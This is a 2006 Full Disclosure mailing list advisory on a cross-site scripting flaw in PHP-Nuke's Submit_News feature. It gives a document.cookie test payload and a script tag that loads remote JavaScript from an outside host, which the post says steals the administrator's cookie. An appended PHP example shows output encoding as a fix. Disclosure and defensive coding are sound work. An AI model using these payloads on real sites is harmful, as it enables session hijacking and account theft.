Full Disclosure mailing list archives
PHP-NUKE Submit_News Cross-Site Scripting Vulnerability
From: "0o_zeus_o0 security-mx.org" <zeus.olimpusklan () gmail com>
Date: Wed, 1 Mar 2006 18:24:27 -0600
###########################################################################
# Advisory #9 Title: PHP-NUKE Submit_News Cross-Site Scripting Vulnerability
#
# Author: 0o_zeus_o0
# Contact: zeus () diosdelared com
# Website: www.elitemexico.org
# Date: 01/03/2006
# Risk: High
# Vendor Url: http://www.phpnuke-espanol.org/
# Affected Software: php-nuke
# Non Affected:
#
# We Are: olimpus klan team
#
#Info:
#================================================================
#Vulnerability that affects all phpnuke systems in Submit_News. The bug consists
#of inserting XSS code in the submission of user news; this causes that
#when the administrator receives that news, it robs his cookie. This
#would cause identity robbery.
#
#Example XSS:
#================================================================
#
#<script>alert(document.cookie);</script>
#
#<SCRIPT SRC=http://elitemexico.org/xss.js></SCRIPT>
#================================================================
#
#Solution:
#================================================================
#
#VULNERABLE VERSIONS
#================================================================
#all versions
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus () diosdelared com
#www.elitemexico.org
#================================================================
#greetz: lady fire, Mi beba, olimpus klan team and elitemexico
###########################################################################
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
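The advisory leaves its Solution section empty. As an added example (not part of the original post and not PHP-Nuke code), one way to keep a submitted story inert when the administrator reviews it is to HTML-encode every submitted field on output and mark the session cookie HttpOnly; the function and field names below are hypothetical.

```php
<?php
// Added example, not PHP-Nuke code. Function and field names are hypothetical.

// Defense in depth: a cookie flagged HttpOnly is not readable through
// document.cookie, so a script that does slip through cannot read the session.
ini_set('session.cookie_httponly', '1');

// Encode an untrusted value for an HTML text or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render one pending submission for the administrator's review queue.
// Every user-supplied field is encoded at the point of output.
function render_pending_story(array $story): string
{
    return sprintf(
        "<div class=\"pending\">\n<h3>%s</h3>\n<p>by %s</p>\n<pre>%s</pre>\n</div>\n",
        h($story['subject']),
        h($story['author']),
        h($story['body'])
    );
}

// Constructed sample: a submission carrying the advisory's first example string.
$story = [
    'subject' => 'Hello',
    'author'  => 'anonymous',
    'body'    => '<script>alert(document.cookie);</script>',
];

$html = render_pending_story($story);
echo $html;

// The submitted markup must reach the browser as text, not as an element.
if (stripos($html, '<script') !== false) {
    throw new RuntimeException('unescaped markup in review queue output');
}
```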